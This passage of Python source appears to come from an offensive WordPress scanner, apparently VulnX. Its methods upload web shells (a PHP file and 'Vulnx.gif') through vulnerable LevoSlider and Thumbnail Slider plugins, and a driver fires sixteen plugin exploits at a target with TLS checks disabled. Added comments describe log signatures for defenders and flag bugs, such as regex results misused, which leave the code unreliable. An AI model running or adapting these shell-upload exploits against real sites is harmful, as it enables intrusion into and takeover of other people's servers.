            'album_desk': '',
        }
        # verify=False: TLS certificate validation is disabled for this request.
        send_shell = requests.post(endpoint, data=options,headers=self.headers,verify=False).text
        check = re.findall(
            "/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell)
        if check:
            # NOTE(review): .group(1) is called on the value returned by
            # re.findall -- confirm this branch runs as intended.
            dump_data = self.url + "/wp-content/uploads/levoslideshow/" + \
                check.group(1)+"/big/VulnX.php?Vuln=X"
            return dict(
                url=self.url,
                name="LevoSlider Show",
                status=True,
                shell=dump_data
            )
        else:
            return dict(
                url=self.url,
                name="LevoSlider Show",
                status=False
            )

    def wp_thumbnailSlider(self):
        """Send shell/Vulnx.gif as a multipart ``image`` field to the site root.

        Unlike the other wp_* methods this one uses ``files=`` and a ``with``
        block, so the file handle is closed on exit. The POST goes to
        ``self.url`` itself; the admin-page endpoint is commented out below.
        The result of the POST is then searched for a ``/slider/<name>.gif/``
        path.

        Returns:
            dict with ``url``, ``name`` and ``status``; the match branch is
            written to add ``shell`` (see the review note below).

        Defender notes: the log artifact is a multipart POST to the site root
        with an ``image`` part named ``Vulnx.gif``; the URL this method builds
        points under
        ``wp-content/uploads/wp-responsive-images-thumbnail-slider/``.
        wpexploits() in this file does not call this method.
        """
#        endpoint = self.url + "wp-admin/admin.php?page=responsive_thumbnail_slider_image_management"
        with open('shell/Vulnx.gif', 'rb') as img:
            name_img = os.path.basename('shell/Vulnx.gif')
            files = {
                'image': (name_img, img, 'multipart/form-data', {'Expires': '0'})}
            # verify=False: TLS certificate validation is disabled for this request.
            upload_file = requests.post(self.url, files=files,headers=self.headers,verify=False)
            # NOTE(review): re.findall receives the Response object here, and
            # fname is concatenated to a str below -- confirm this path runs
            # as intended before trusting any result from this method.
            fname = re.findall(re.compile(r'/slider\/(.*\.gif)/'), upload_file)
            if fname:
                dump_data = self.url + "wp-content/uploads/wp-responsive-images-thumbnail-slider/"+fname
                return dict(
                    url=self.url,
                    name="Thumbnail Slider",
                    status=True,
                    shell=dump_data
                )
            else:
                return dict(
                    url=self.url,
                    name="Thumbnail Slider",
                    status=False
                )

    def json_writer(self):
        """Placeholder for JSON export; only prints a fixed marker string."""
        marker = 'json_export'
        print(marker)

    def exploit_state(self,exploit):
        """Print a one-line result for a single check.

        Args:
            exploit: result dict; ``status`` and ``name`` are always read,
                and ``dump_data`` is read when ``status`` is truthy.

        The line is built from the imported ``que``, ``vulnexploit`` and
        ``failexploit`` values. Nothing is returned and nothing is logged
        anywhere other than stdout.
        """
        if (exploit['status']):
            # NOTE(review): the wp_* methods visible in this file return the
            # URL under the key 'shell', not 'dump_data' -- TODO confirm which
            # key is intended.
            print(' {0} {1} {2} {3}'.format(que,exploit['name'],vulnexploit,exploit['dump_data']))
        else:
            print(' {0} {1} \t\t {2}'.format(que,exploit['name'],failexploit))

    def wpexploits(self):
        """Run the wp_* checks in a fixed order and print each result.

        Each call below issues live HTTP requests against ``self.url`` and
        hands the returned dict to exploit_state(). There is no exception
        handling here, so an error raised by any check stops the run at that
        point. wp_thumbnailSlider is not among the calls visible here.

        Defender notes: the order is fixed, so one run produces the same
        sequence of endpoint requests against a host every time, which makes
        the sequence itself a usable access-log signature. wp_revslider
        rebinds ``self.headers``, so the checks listed after it run with the
        three-key header dict that method installs.
        """
        self.exploit_state(self.wp_wysija())
        self.exploit_state(self.wp_blaze())
        self.exploit_state(self.wp_synoptic())
        self.exploit_state(self.wp_catpro())
        self.exploit_state(self.wp_cherry())
        self.exploit_state(self.wp_dm())
        self.exploit_state(self.wp_fromcraft())
        self.exploit_state(self.wp_jobmanager())
        self.exploit_state(self.wp_showbiz())
        self.exploit_state(self.wp_shop())
        self.exploit_state(self.wp_powerzoomer())
        self.exploit_state(self.wp_revslider())
        self.exploit_state(self.wp_adsmanager())
        self.exploit_state(self.wp_inboundiomarketing())
        self.exploit_state(self.wp_adblockblocker())
        self.exploit_state(self.wp_levoslideshow())